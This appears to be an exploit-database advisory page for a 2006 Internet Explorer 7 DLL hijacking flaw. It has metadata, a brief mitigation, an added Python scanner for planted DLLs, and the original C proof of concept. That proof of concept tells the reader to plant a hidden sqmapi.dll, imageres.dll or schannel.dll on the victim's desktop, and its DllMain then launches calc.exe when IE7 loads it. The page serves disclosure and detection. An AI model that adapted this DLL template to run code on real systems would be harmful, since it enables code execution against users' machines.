Vendor: Internet Explorer
By: Aviv Raff
CVSS: 7,2 HIGH
DLL Hijacking
CWE: 427
Product Name: Internet Explorer
Affected Version From: IE7
Affected Version To: IE7
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:internet_explorer:7.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2006

IE7 Calculator Popup

This exploit allows an attacker to execute arbitrary code on a vulnerable system by hijacking a legitimate DLL file. The attacker must upload a malicious DLL file to the victim's desktop as one of the following hidden DLL files: sqmapi.dll, imageres.dll, or schannel.dll. When the victim runs IE7, the malicious DLL will be loaded and the attacker's code will be executed. This exploit was tested on Windows XP SP2 with fully patched IE7.

Mitigation:

Ensure that all DLL files are legitimate and up-to-date.
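
One way to check for the condition described above, as an added example that is not part of the original advisory or the exploit author's code: scan user-writable directories for the three DLL names listed on this page and report any copy found outside a trusted system directory. The function names, the choice of system32 as the trusted location, and the directory layout built in demo() are assumptions made for illustration.

```python
import os
import stat
import tempfile

# DLL names this page lists as loaded by IE7 when planted on the desktop.
WATCHED_NAMES = {"sqmapi.dll", "imageres.dll", "schannel.dll"}

def is_hidden(path):
    """True if the Windows hidden attribute is set (always False elsewhere)."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2))

def find_planted_dlls(search_dirs, trusted_dirs):
    """Return sorted (path, hidden) pairs for watched names outside trusted_dirs."""
    trusted = [os.path.normcase(os.path.abspath(d)) for d in trusted_dirs]
    findings = []
    for root_dir in search_dirs:
        for dirpath, _dirs, files in os.walk(root_dir):
            here = os.path.normcase(os.path.abspath(dirpath))
            # Copies inside a trusted directory (or below it) are expected.
            if any(here == t or here.startswith(t + os.sep) for t in trusted):
                continue
            for name in files:
                # Windows file names are case-insensitive, so compare lowercased.
                if name.lower() in WATCHED_NAMES:
                    full = os.path.join(dirpath, name)
                    findings.append((full, is_hidden(full)))
    return sorted(findings)

def demo():
    """Scan a constructed layout: one planted DLL on a desktop, one real one."""
    with tempfile.TemporaryDirectory() as base:
        desktop = os.path.join(base, "Desktop")
        system32 = os.path.join(base, "WINDOWS", "system32")
        os.makedirs(desktop)
        os.makedirs(system32)
        for folder, name in [(desktop, "SQMAPI.DLL"), (desktop, "notes.txt"),
                             (system32, "schannel.dll")]:
            open(os.path.join(folder, name), "wb").close()
        hits = find_planted_dlls([base], trusted_dirs=[system32])
        return [os.path.relpath(path, base) for path, _hidden in hits]

if __name__ == "__main__":
    print(demo())
```

On a real host, pass the user profile directories as search_dirs and the Windows system directory as trusted_dirs; a hit with hidden set to True matches the placement the exploit notes describe.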
Source

Exploit-DB raw data:

/*
        Copyright (C) 2006-2007 Aviv Raff
        http://aviv.raffon.net
        Greetz: hdm, L.M.H, str0ke, SkyLined

        Compile and upload to the victim's desktop as one of the following hidden DLL files:
        - sqmapi.dll
        - imageres.dll
        - schannel.dll

        Run IE7 and watch the nice calculators pop up.
        Filter fdwReason to execute only once.

        Tested on WinXP SP2 with fully patched IE7.
        For testing/educational purpose only!

*/


#include <windows.h>

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    TCHAR windir[_MAX_PATH];
    TCHAR cmd[ _MAX_PATH ];
    GetEnvironmentVariable("WINDIR",windir,_MAX_PATH );
    wsprintf(cmd,"%s\\system32\\calc.exe",windir);
    ZeroMemory(&si,sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi,sizeof(pi));
    CreateProcess(NULL,cmd,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return TRUE;
}

// milw0rm.com [2006-12-14]